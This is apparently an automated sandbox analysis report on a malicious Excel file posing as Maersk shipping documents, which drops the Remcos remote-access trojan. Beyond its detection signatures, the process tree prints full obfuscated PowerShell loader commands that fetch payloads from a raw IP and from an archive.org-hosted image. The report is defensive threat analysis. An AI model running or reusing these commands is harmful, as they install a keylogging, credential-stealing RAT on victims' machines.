Edit tour
Windows
Analysis Report
Maersk BL, IN & PL.xls
Overview
General Information
Detection
Remcos
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs a global keyboard hook
Installs new ROOT certificates
Machine Learning detection for sample
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
PowerShell case anomaly found
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious command line found
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected potential crypto function
Document contains embedded VBA macros
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Excel Network Connections
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: Usage Of Web Request Commands And Cmdlets
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match
Classification
- System is w7x64
- EXCEL.EXE (PID: 3564 cmdline:
"C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) - mshta.exe (PID: 3852 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - cmd.exe (PID: 3944 cmdline:
"C:\Window s\system32 \cmd.exe" "/C POwerS HELl -EX bYPAsS -Nop -w 1 -C DEvIceCRe DEntIaldeP lOyMeNT.Ex e ; ieX( $(IeX('[SY STEm.texT. ENCODING]' +[CHaR]0x3 A+[cHAR]0x 3A+'uTf8.g ETstrInG([ systEm.CoN VErT]'+[Ch Ar]0X3a+[C har]58+'FR omBaSe64st RINg('+[CH aR]0x22+'J GggICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICA9ICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gQWRELXRZc GUgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAtTWV tYkVyREVGa U5pdGlPbiA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICdbRGxsS W1wb3J0KCJ VckxNT24uZ ExsIiwgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB DaGFyU2V0I D0gQ2hhclN ldC5Vbmljb 2RlKV1wdWJ saWMgc3Rhd GljIGV4dGV ybiBJbnRQd HIgVVJMRG9 3bmxvYWRUb 0ZpbGUoSW5 0UHRyICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgZ FN5YVRSeix zdHJpbmcgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBsc3hnWUw sc3RyaW5nI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgY1osdWl udCAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIHdlU UNNeVlxLEl udFB0ciAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI HYpOycgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA tbmFNZSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CJ5VE1FIiA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIC1OYU1FU 3BBY0UgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB EYWZ5Rlprc VNaICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLVB hc3NUaHJ1O yAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICRoOjp VUkxEb3dub G9hZFRvRml sZSgwLCJod HRwOi8vMzg uMjQwLjQ0L jkvNTkwL25 pY2VmZWF0d XJlc3dvcmt pbmdncmVhd C5UaWYiLCI kZU52OkFQU ERBVEFcbml jZWZlYXR1c mVzd29ya2l uZ2dyZWF0L nZiUyIsMCw wKTtzVEFyV C1TTGVFcCg zKTtTdEFSV CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICIkZU5 WOkFQUERBV EFcbmljZWZ lYXR1cmVzd 29ya2luZ2d yZWF0LnZiU yI='+[Char ]0x22+'))' )))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - powershell.exe (PID: 3968 cmdline:
POwerSHELl -EX bYP AsS -Nop -w 1 -C DEv IceCReDEnt IaldePlOyM eNT.Exe ; ieX($(Ie X('[SYSTEm .texT.ENCO DING]'+[CH aR]0x3A+[c HAR]0x3A+' uTf8.gETst rInG([syst Em.CoNVErT ]'+[ChAr]0 X3a+[Char] 58+'FRomBa Se64stRINg ('+[CHaR]0 x22+'JGggI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CA9ICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgQWR ELXRZcGUgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAtTWVtYkV yREVGaU5pd GlPbiAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICd bRGxsSW1wb 3J0KCJVckx NT24uZExsI iwgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBDaGF yU2V0ID0gQ 2hhclNldC5 Vbmljb2RlK V1wdWJsaWM gc3RhdGljI GV4dGVybiB JbnRQdHIgV VJMRG93bmx vYWRUb0Zpb GUoSW50UHR yICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgZFN5Y VRSeixzdHJ pbmcgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBsc 3hnWUwsc3R yaW5nICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgY 1osdWludCA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIHdlUUNNe VlxLEludFB 0ciAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIHYpO ycgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAtbmF NZSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICJ5V E1FIiAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIC1 OYU1FU3BBY 0UgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBEYWZ 5RlprcVNaI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLVBhc3N UaHJ1OyAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CRoOjpVUkx Eb3dubG9hZ FRvRmlsZSg wLCJodHRwO i8vMzguMjQ wLjQ0LjkvN TkwL25pY2V mZWF0dXJlc 3dvcmtpbmd ncmVhdC5Ua WYiLCIkZU5 2OkFQUERBV EFcbmljZWZ lYXR1cmVzd 29ya2luZ2d yZWF0LnZiU yIsMCwwKTt zVEFyVC1TT GVFcCgzKTt TdEFSVCAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CIkZU5WOkF QUERBVEFcb mljZWZlYXR 1cmVzd29ya 2luZ2dyZWF 0LnZiUyI=' +[Char]0x2 2+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 4088 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\nnmswn bn\nnmswnb n.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 2908 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RES781D.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\nnm swnbn\CSC2 F3646BAED0 D4162AB721 EA9AB40E2E A.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - wscript.exe (PID: 2632 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\nicef eatureswor kinggreat. vbS" MD5: 045451FA238A75305CC26AC982472367) - powershell.exe (PID: 3352 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LiggKFtzdF JpbkddJFZl ckJPU0Vwck VGRVJlTkNF KVsxLDNdKy dYJy1qT2lu JycpICgoKC d7MH1pbWFn ZVVybCAnKy c9IHsxfWh0 dHBzOi8vaS crJ2E2MDAx MDIudXMuYX JjaGl2ZS5v cmcvMzIvaX RlbXMvZGV0 YWgtbm90Jy snZS12XzIw MjQxMC9EZX RhaE5vdGVf Vi5qcGcgez F9O3swfXdl YkNsaWVudC A9IE5ldy1P YmplY3QgU3 lzdGUnKydt Lk5ldC5XZW JDbGllbnQ7 ezB9aW1hZ2 VCJysneScr J3RlcyA9IH swfXdlYkNs aWVudC5Eb3 dubG9hZERh dGEoezB9aW 1hZycrJ2VV cmwpO3swfW ltYWdlVGV4 dCA9IFtTeX N0ZW0uVGV4 dC5FbmNvZG luZ106OlVU RjguR2V0U3 RyaW5nKCcr J3swfWltYW dlQnl0ZXMp O3swfXN0YX J0RmxhZyA9 IHsxfTw8Qk FTRTY0X1NU QVJUJysnPj 57MX07ezB9 ZW5kRmxhZy A9IHsxfTw8 QkFTRScrJz Y0X0VORD4+ ezF9O3swfX N0YXJ0SW5k ZXggPSAnKy d7MH1pbWFn ZVRleHQuSW 5kZXhPZih7 MH1zdGFydE ZsYWcpO3sw fWVuZEluZG V4ID0gezB9 aW1hZ2VUZX h0LkluZGV4 T2YoezB9ZW 5kRicrJ2xh Zyk7ezB9c3 RhcnRJJysn bmRleCAtZ2 UgMCAtYW5k IHswfWVuZE luZGV4IC0n KydndCB7MH 1zdGFydElu JysnZGV4O3 swfXN0YXJ0 SW5kZXggKz 0gezB9c3Rh JysncnRGbG FnLkxlbmd0 aDt7MH1iYX NlNjRMZW5n dGgnKycgPS B7MCcrJ31l bmRJbmRleC AtJysnIHsw fXN0YXJ0SW 4nKydkZXg7 ezB9YmFzZT Y0Q29tbWFu ZCA9IHswfW ltJysnYWdl VGV4dC5TdW JzdHJpbmco ezB9c3Rhcn RJbmRleCwg ezB9YmFzZT Y0TGVuZ3Ro KTt7MH1jb2 1tYW5kQnl0 ZXMgPSBbU3 lzdGVtLkNv bnZlcnRdOj pGcm9tQmFz ZTY0U3RyaS crJ25nKHsw fWJhc2U2NE NvbW1hbmQp O3swJysnfW xvYWRlZEFz c2VtYmx5ID 0gW1N5c3Rl bS5SJysnZW ZsZWN0aW9u LkFzc2VtYi crJ2x5XTo6 TG9hZCh7Jy snMH1jb21t YW5kQnl0ZX MpO3swfXZh aU1ldGhvZC A9IFtkbmxp Yi5JTy5Ib2 1lXS5HZXRN ZXRob2Qoey crJzF9VkFJ ezF9KTt7MH 12YWknKydN ZXRob2QuSW 52b2tlKHsw fW51bGwsIE AoezF9dHh0 LkRSUlNSUi 8wOTUvOS40 NC4wNDIuOD MvLzpwdHRo ezF9LCB7MX 1kZXNhdGl2 YWRvezF9LC B7MX1kZXNh dGl2YWRvey crJzF9LCB7 MX1kZXNhdG l2YWRvezF9 LCB7MX1SZW dBc217MX0s IHsxfWRlc2 F0aXZhZG97 MX0sIHsxfW QnKydlc2F0 aXZhZG8nKy d7MX0pKTsn KSAgLUYgIF tDSEFyXTM2 LFtDSEFyXT M5KSAp';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 2476 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and ".( ([ stRinG]$Ve rBOSEprEFE ReNCE)[1,3 ]+'X'-jOin '') ((('{0 }imageUrl '+'= {1}ht tps://i'+' a600102.us .archive.o rg/32/item s/detah-no t'+'e-v_20 2410/Detah Note_V.jpg {1};{0}we bClient = New-Object Syste'+'m .Net.WebCl ient;{0}im ageB'+'y'+ 'tes = {0} webClient. DownloadDa ta({0}imag '+'eUrl);{ 0}imageTex t = [Syste m.Text.Enc oding]::UT F8.GetStri ng('+'{0}i mageBytes) ;{0}startF lag = {1}< <BASE64_ST ART'+'>>{1 };{0}endFl ag = {1}<< BASE'+'64_ END>>{1};{ 0}startInd ex = '+'{0 }imageText .IndexOf({ 0}startFla g);{0}endI ndex = {0} imageText. IndexOf({0 }endF'+'la g);{0}star tI'+'ndex -ge 0 -and {0}endInd ex -'+'gt {0}startIn '+'dex;{0} startIndex += {0}sta '+'rtFlag. Length;{0} base64Leng th'+' = {0 '+'}endInd ex -'+' {0 }startIn'+ 'dex;{0}ba se64Comman d = {0}im' +'ageText. Substring( {0}startIn dex, {0}ba se64Length );{0}comma ndBytes = [System.Co nvert]::Fr omBase64St ri'+'ng({0 }base64Com mand);{0'+ '}loadedAs sembly = [ System.R'+ 'eflection .Assemb'+' ly]::Load( {'+'0}comm andBytes); {0}vaiMeth od = [dnli b.IO.Home] .GetMethod ({'+'1}VAI {1});{0}va i'+'Method .Invoke({0 }null, @({ 1}txt.DRRS RR/095/9.4 4.042.83// :ptth{1}, {1}desativ ado{1}, {1 }desativad o{'+'1}, { 1}desativa do{1}, {1} RegAsm{1}, {1}desati vado{1}, { 1}d'+'esat ivado'+'{1 }));') -F [CHAr]36,[ CHAr]39) ) " MD5: A575A7610E5F003CC36DF39E07C4BA7D) - RegAsm.exe (PID: 3592 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Asm.exe" MD5: 8FE9545E9F72E460723F484C304314AD) - RegAsm.exe (PID: 3888 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\RegA sm.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\rq gexaaqlwos dbspgszm" MD5: 8FE9545E9F72E460723F484C304314AD) - RegAsm.exe (PID: 3768 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\RegA sm.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\tk loyslrzegx fpgbpcmonk o" MD5: 8FE9545E9F72E460723F484C304314AD) - RegAsm.exe (PID: 3764 cmdline:
C:\Windows \Microsoft .NET\Frame work\v4.0. 30319\RegA sm.exe /st ext "C:\Us ers\user\A ppData\Loc al\Temp\em rhylvlvnyk qvcfgfgpxw bgnd" MD5: 8FE9545E9F72E460723F484C304314AD) - mshta.exe (PID: 2104 cmdline:
C:\Windows \System32\ mshta.exe -Embedding MD5: 95828D670CFD3B16EE188168E083C3C5) - cmd.exe (PID: 2244 cmdline:
"C:\Window s\system32 \cmd.exe" "/C POwerS HELl -EX bYPAsS -Nop -w 1 -C DEvIceCRe DEntIaldeP lOyMeNT.Ex e ; ieX( $(IeX('[SY STEm.texT. ENCODING]' +[CHaR]0x3 A+[cHAR]0x 3A+'uTf8.g ETstrInG([ systEm.CoN VErT]'+[Ch Ar]0X3a+[C har]58+'FR omBaSe64st RINg('+[CH aR]0x22+'J GggICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICA9ICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gQWRELXRZc GUgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAtTWV tYkVyREVGa U5pdGlPbiA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICdbRGxsS W1wb3J0KCJ VckxNT24uZ ExsIiwgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB DaGFyU2V0I D0gQ2hhclN ldC5Vbmljb 2RlKV1wdWJ saWMgc3Rhd GljIGV4dGV ybiBJbnRQd HIgVVJMRG9 3bmxvYWRUb 0ZpbGUoSW5 0UHRyICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgZ FN5YVRSeix zdHJpbmcgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CBsc3hnWUw sc3RyaW5nI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgY1osdWl udCAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIHdlU UNNeVlxLEl udFB0ciAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI HYpOycgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA tbmFNZSAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CJ5VE1FIiA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIC1OYU1FU 3BBY0UgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICB EYWZ5Rlprc VNaICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgLVB hc3NUaHJ1O yAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICRoOjp VUkxEb3dub G9hZFRvRml sZSgwLCJod HRwOi8vMzg uMjQwLjQ0L jkvNTkwL25 pY2VmZWF0d XJlc3dvcmt pbmdncmVhd C5UaWYiLCI kZU52OkFQU ERBVEFcbml jZWZlYXR1c mVzd29ya2l uZ2dyZWF0L nZiUyIsMCw wKTtzVEFyV C1TTGVFcCg zKTtTdEFSV CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICIkZU5 WOkFQUERBV EFcbmljZWZ lYXR1cmVzd 29ya2luZ2d yZWF0LnZiU yI='+[Char ]0x22+'))' )))" MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41) - powershell.exe (PID: 1840 cmdline:
POwerSHELl -EX bYP AsS -Nop -w 1 -C DEv IceCReDEnt IaldePlOyM eNT.Exe ; ieX($(Ie X('[SYSTEm .texT.ENCO DING]'+[CH aR]0x3A+[c HAR]0x3A+' uTf8.gETst rInG([syst Em.CoNVErT ]'+[ChAr]0 X3a+[Char] 58+'FRomBa Se64stRINg ('+[CHaR]0 x22+'JGggI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CA9ICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgQWR ELXRZcGUgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAtTWVtYkV yREVGaU5pd GlPbiAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICd bRGxsSW1wb 3J0KCJVckx NT24uZExsI iwgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBDaGF yU2V0ID0gQ 2hhclNldC5 Vbmljb2RlK V1wdWJsaWM gc3RhdGljI GV4dGVybiB JbnRQdHIgV VJMRG93bmx vYWRUb0Zpb GUoSW50UHR yICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgZFN5Y VRSeixzdHJ pbmcgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICBsc 3hnWUwsc3R yaW5nICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgY 1osdWludCA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gIHdlUUNNe VlxLEludFB 0ciAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgIHYpO ycgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAtbmF NZSAgICAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICJ5V E1FIiAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICAgIC1 OYU1FU3BBY 0UgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgICBEYWZ 5RlprcVNaI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CAgLVBhc3N UaHJ1OyAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CRoOjpVUkx Eb3dubG9hZ FRvRmlsZSg wLCJodHRwO i8vMzguMjQ wLjQ0LjkvN TkwL25pY2V mZWF0dXJlc 3dvcmtpbmd ncmVhdC5Ua WYiLCIkZU5 2OkFQUERBV EFcbmljZWZ lYXR1cmVzd 29ya2luZ2d yZWF0LnZiU yIsMCwwKTt zVEFyVC1TT GVFcCgzKTt TdEFSVCAgI CAgICAgICA gICAgICAgI CAgICAgICA gICAgICAgI CIkZU5WOkF QUERBVEFcb mljZWZlYXR 1cmVzd29ya 2luZ2dyZWF 0LnZiUyI=' +[Char]0x2 2+'))')))" MD5: A575A7610E5F003CC36DF39E07C4BA7D) - csc.exe (PID: 2672 cmdline:
"C:\Window s\Microsof t.NET\Fram ework64\v4 .0.30319\c sc.exe" /n oconfig /f ullpaths @ "C:\Users\ user\AppDa ta\Local\T emp\op4j5m gw\op4j5mg w.cmdline" MD5: 23EE3D381CFE3B9F6229483E2CE2F9E1) - cvtres.exe (PID: 3360 cmdline:
C:\Windows \Microsoft .NET\Frame work64\v4. 0.30319\cv tres.exe / NOLOGO /RE ADONLY /MA CHINE:IX86 "/OUT:C:\ Users\user \AppData\L ocal\Temp\ RESB635.tm p" "c:\Use rs\user\Ap pData\Loca l\Temp\op4 j5mgw\CSC6 1FD86854EB B47F380D57 89CC9CFF7A .TMP" MD5: C877CBB966EA5939AA2A17B6A5160950) - wscript.exe (PID: 2368 cmdline:
"C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\nicef eatureswor kinggreat. vbS" MD5: 045451FA238A75305CC26AC982472367) - powershell.exe (PID: 3932 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -command $ Codigo = ' LiggKFtzdF JpbkddJFZl ckJPU0Vwck VGRVJlTkNF KVsxLDNdKy dYJy1qT2lu JycpICgoKC d7MH1pbWFn ZVVybCAnKy c9IHsxfWh0 dHBzOi8vaS crJ2E2MDAx MDIudXMuYX JjaGl2ZS5v cmcvMzIvaX RlbXMvZGV0 YWgtbm90Jy snZS12XzIw MjQxMC9EZX RhaE5vdGVf Vi5qcGcgez F9O3swfXdl YkNsaWVudC A9IE5ldy1P YmplY3QgU3 lzdGUnKydt Lk5ldC5XZW JDbGllbnQ7 ezB9aW1hZ2 VCJysneScr J3RlcyA9IH swfXdlYkNs aWVudC5Eb3 dubG9hZERh dGEoezB9aW 1hZycrJ2VV cmwpO3swfW ltYWdlVGV4 dCA9IFtTeX N0ZW0uVGV4 dC5FbmNvZG luZ106OlVU RjguR2V0U3 RyaW5nKCcr J3swfWltYW dlQnl0ZXMp O3swfXN0YX J0RmxhZyA9 IHsxfTw8Qk FTRTY0X1NU QVJUJysnPj 57MX07ezB9 ZW5kRmxhZy A9IHsxfTw8 QkFTRScrJz Y0X0VORD4+ ezF9O3swfX N0YXJ0SW5k ZXggPSAnKy d7MH1pbWFn ZVRleHQuSW 5kZXhPZih7 MH1zdGFydE ZsYWcpO3sw fWVuZEluZG V4ID0gezB9 aW1hZ2VUZX h0LkluZGV4 T2YoezB9ZW 5kRicrJ2xh Zyk7ezB9c3 RhcnRJJysn bmRleCAtZ2 UgMCAtYW5k IHswfWVuZE luZGV4IC0n KydndCB7MH 1zdGFydElu JysnZGV4O3 swfXN0YXJ0 SW5kZXggKz 0gezB9c3Rh JysncnRGbG FnLkxlbmd0 aDt7MH1iYX NlNjRMZW5n dGgnKycgPS B7MCcrJ31l bmRJbmRleC AtJysnIHsw fXN0YXJ0SW 4nKydkZXg7 ezB9YmFzZT Y0Q29tbWFu ZCA9IHswfW ltJysnYWdl VGV4dC5TdW JzdHJpbmco ezB9c3Rhcn RJbmRleCwg ezB9YmFzZT Y0TGVuZ3Ro KTt7MH1jb2 1tYW5kQnl0 ZXMgPSBbU3 lzdGVtLkNv bnZlcnRdOj pGcm9tQmFz ZTY0U3RyaS crJ25nKHsw fWJhc2U2NE NvbW1hbmQp O3swJysnfW xvYWRlZEFz c2VtYmx5ID 0gW1N5c3Rl bS5SJysnZW ZsZWN0aW9u LkFzc2VtYi crJ2x5XTo6 TG9hZCh7Jy snMH1jb21t YW5kQnl0ZX MpO3swfXZh aU1ldGhvZC A9IFtkbmxp Yi5JTy5Ib2 1lXS5HZXRN ZXRob2Qoey crJzF9VkFJ ezF9KTt7MH 12YWknKydN ZXRob2QuSW 52b2tlKHsw fW51bGwsIE AoezF9dHh0 LkRSUlNSUi 8wOTUvOS40 NC4wNDIuOD MvLzpwdHRo ezF9LCB7MX 1kZXNhdGl2 YWRvezF9LC B7MX1kZXNh dGl2YWRvey crJzF9LCB7 MX1kZXNhdG l2YWRvezF9 LCB7MX1SZW dBc217MX0s IHsxfWRlc2 F0aXZhZG97 MX0sIHsxfW QnKydlc2F0 aXZhZG8nKy d7MX0pKTsn KSAgLUYgIF tDSEFyXTM2 LFtDSEFyXT M5KSAp';$O Wjuxd = [s ystem.Text .encoding] ::UTF8.Get String([sy stem.Conve rt]::Fromb ase64Strin g($codigo) );powershe ll.exe -wi ndowstyle hidden -ex ecutionpol icy bypass -NoProfil e -command $OWjuxD MD5: A575A7610E5F003CC36DF39E07C4BA7D) - powershell.exe (PID: 4040 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -windowsty le hidden -execution policy byp ass -NoPro file -comm and ".( ([ stRinG]$Ve rBOSEprEFE ReNCE)[1,3 ]+'X'-jOin '') ((('{0 }imageUrl '+'= {1}ht tps://i'+' a600102.us .archive.o rg/32/item s/detah-no t'+'e-v_20 2410/Detah Note_V.jpg {1};{0}we bClient = New-Object Syste'+'m .Net.WebCl ient;{0}im ageB'+'y'+ 'tes = {0} webClient. DownloadDa ta({0}imag '+'eUrl);{ 0}imageTex t = [Syste m.Text.Enc oding]::UT F8.GetStri ng('+'{0}i mageBytes) ;{0}startF lag = {1}< <BASE64_ST ART'+'>>{1 };{0}endFl ag = {1}<< BASE'+'64_ END>>{1};{ 0}startInd ex = '+'{0 }imageText .IndexOf({ 0}startFla g);{0}endI ndex = {0} imageText. IndexOf({0 }endF'+'la g);{0}star tI'+'ndex -ge 0 -and {0}endInd ex -'+'gt {0}startIn '+'dex;{0} startIndex += {0}sta '+'rtFlag. Length;{0} base64Leng th'+' = {0 '+'}endInd ex -'+' {0 }startIn'+ 'dex;{0}ba se64Comman d = {0}im' +'ageText. Substring( {0}startIn dex, {0}ba se64Length );{0}comma ndBytes = [System.Co nvert]::Fr omBase64St ri'+'ng({0 }base64Com mand);{0'+ '}loadedAs sembly = [ System.R'+ 'eflection .Assemb'+' ly]::Load( {'+'0}comm andBytes); {0}vaiMeth od = [dnli b.IO.Home] .GetMethod ({'+'1}VAI {1});{0}va i'+'Method .Invoke({0 }null, @({ 1}txt.DRRS RR/095/9.4 4.042.83// :ptth{1}, 